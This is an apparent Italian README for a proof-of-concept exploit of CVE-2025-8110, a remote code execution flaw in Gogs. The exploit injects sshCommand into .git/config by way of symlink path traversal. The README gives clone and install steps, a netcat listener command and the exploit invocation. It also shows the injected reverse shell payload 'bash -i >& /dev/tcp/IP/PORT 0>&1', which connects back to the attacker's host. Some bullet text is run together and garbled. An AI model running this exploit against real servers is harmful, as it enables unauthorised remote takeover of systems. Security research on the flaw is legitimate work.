
Exploit proof-of-concept per CVE-2025-8110, una vulnerabilità RCE in Gogs che sfrutta l'attraversamento di percorso tramite link simbolici e l'iniezione di sshCommand per fornire una reverse shell.
Un Proof of Concept (PoC) per CVE-2025-8110, una vulnerabilità critica in Gogs che permette l'esecuzione remota di codice (RCE) tramite manipolazione di .git/config usando bypass di link simbolici e iniezione di sshCommand.
Questo exploit sfrutta una falla di Path Traversal nella gestione dei contenuti dell'API di Gogs. Un utente autenticato può:
.git/config interno.sshCommand malevolo per eseguire una Reverse Shell quando il server esegue operazioni Git.!, @).Rich.git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
Installa le dipendenze:
pip3 install -r requirements.txt
Avvia il listener:
nc -lvnp 6666
Esegui l'exploit:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
Argomenti:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Quando Gogs esegue un comando Git che richiede trasporto di rete (come una sincronizzazione mirror o un controllo di riferimento interno), invoca sshCommand, attivando la reverse shell.
| Argomento | Descrizione |
|---|
-u, --url | URL base dell'istanza Gogs target (es. http://target.htb:3000). |
-lh, --host | IP dell'attaccante (LHOST) a cui la reverse shell si connetterà. |
-lp, --port | Porta di ascolto (LPORT) configurata sulla tua macchina. |
-p, --password | Password per l'account pwnuser per eseguire l'autenticazione. |
-x, --proxy | (Opzionale) Instrada il traffico attraverso un proxy locale (default: http://localhost:8080). |